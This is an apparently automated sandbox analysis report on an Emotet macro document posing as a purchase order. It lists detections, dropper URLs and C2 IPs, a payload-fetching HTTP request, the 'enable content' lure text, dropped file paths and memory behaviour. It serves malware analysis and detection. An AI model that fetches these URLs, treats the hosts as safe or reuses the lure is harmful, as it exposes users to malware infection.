Analysis Report PO# 01222021.doc

Overview

General Information

Sample Name: PO# 01222021.doc
Analysis ID: 344615
MD5: 556b98b4cdae000de8f496d6d896743c
SHA1: b7ca4118eab252bc4758fa18265b04a2afbbf9c2
SHA256: dcfb145c4f46a072e988cdeafc065f8116dc3b27d6bed447024677f3ea2f252a

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://cab.mykfn.com/admin/X/ Avira URL Cloud: Label: malware
Source: http://gocphongthe.com/wp-content/lMMC/ Avira URL Cloud: Label: malware
Source: http://ie-best.net/online-timer-kvhxz/ilXL/ Avira URL Cloud: Label: malware
Source: http://www.letscompareonline.com/de.letscompareonline.com/wYd/ Avira URL Cloud: Label: malware
Source: http://bhaktivrind.com/cgi-bin/JBbb8/ Avira URL Cloud: Label: malware
Source: http://cab.mykfn.com Avira URL Cloud: Label: malware
Source: http://vanddnabhargave.com/asset/W9o/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://cab.mykfn.com/admin/X/ Virustotal: Detection: 15%
Source: http://gocphongthe.com/wp-content/lMMC/ Virustotal: Detection: 10%
Source: http://ie-best.net/online-timer-kvhxz/ilXL/ Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Metadefender: Detection: 48%
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll ReversingLabs: Detection: 85%
Multi AV Scanner detection for submitted file
Source: PO# 01222021.doc Virustotal: Detection: 66%
Source: PO# 01222021.doc Metadefender: Detection: 48%
Source: PO# 01222021.doc ReversingLabs: Detection: 67%
Machine Learning detection for dropped file
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2097930376.000000001B390000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cab.mykfn.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.143.46.51:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.143.46.51:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in memory: http://cab.mykfn.com/admin/X/!http://bhaktivrind.com/cgi-bin/JBbb8/!http://vanddnabhargave.com/asset/W9o/!http://ie-best.net/online-timer-kvhxz/ilXL/!http://gocphongthe.com/wp-content/lMMC/!http://www.letscompareonline.com/de.letscompareonline.com/wYd/!http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 195.159.28.230:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /admin/X/ HTTP/1.1Host: cab.mykfn.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.159.28.230
Source: Joe Sandbox View IP Address: 69.38.130.14
Source: Joe Sandbox View IP Address: 103.143.46.51
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASN-CATCHCOMNO
Source: Joe Sandbox View ASN Name: TWRS-NYCUS
Source: Joe Sandbox View ASN Name: NETMAGIC-APNetmagicDatacenterMumbaiIN
Source: unknown TCP traffic detected without corresponding DNS query: 69.38.130.14
Source: unknown TCP traffic detected without corresponding DNS query: 69.38.130.14
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6B610EC-9B88-4A7A-BAAD-75353DCC52EC}.tmp
Source: global traffic HTTP traffic detected: GET /admin/X/ HTTP/1.1Host: cab.mykfn.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: cab.mykfn.com
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://bhaktivrind.com/cgi-bin/JBbb8/
Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmp String found in binary or memory: http://cab.mykfn.com
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://cab.mykfn.com/admin/X/
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://gocphongthe.com/wp-content/lMMC/
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://ie-best.net/online-timer-kvhxz/ilXL/
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2092035965.0000000002190000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117451818.00000000028F0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://vanddnabhargave.com/asset/W9o/
Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2092035965.0000000002190000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117451818.00000000028F0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://www.letscompareonline.com/de.letscompareonline.com/wYd/
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0D

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000009.00000002.2125204739.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2340896532.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2169811211.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2182561871.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2135567121.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2339373586.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2192714957.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2149727008.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2192700429.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2182761575.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2165744116.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2128583729.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2125222649.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2151547723.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102076691.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2135550534.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2114421803.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2160551478.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102719700.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2117996445.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2114399878.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2149672448.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2169787783.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2137671003.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193587143.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2170530219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2184882219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102091974.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2339389951.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2160390338.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 6,262 N@m 13 ;a 1009
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll
Very long command line found
Source: unknown Process created: Commandline size = 5949
Source: unknown Process created: Commandline size = 5848
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5848
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Agilzgamuljjdwml\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B0D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000DBB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014602
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002814
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001821E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018A24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001DA27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A82A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B22A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000422B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A02C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A82C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E42E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BA46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F249
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018C4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001505A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001662
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001664
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D87D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010082
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018489
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002C93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000AE9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100026A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10008EA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100112B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BEBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100048C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004AD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100068D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100084D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100042DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010CE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100038E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012CE3
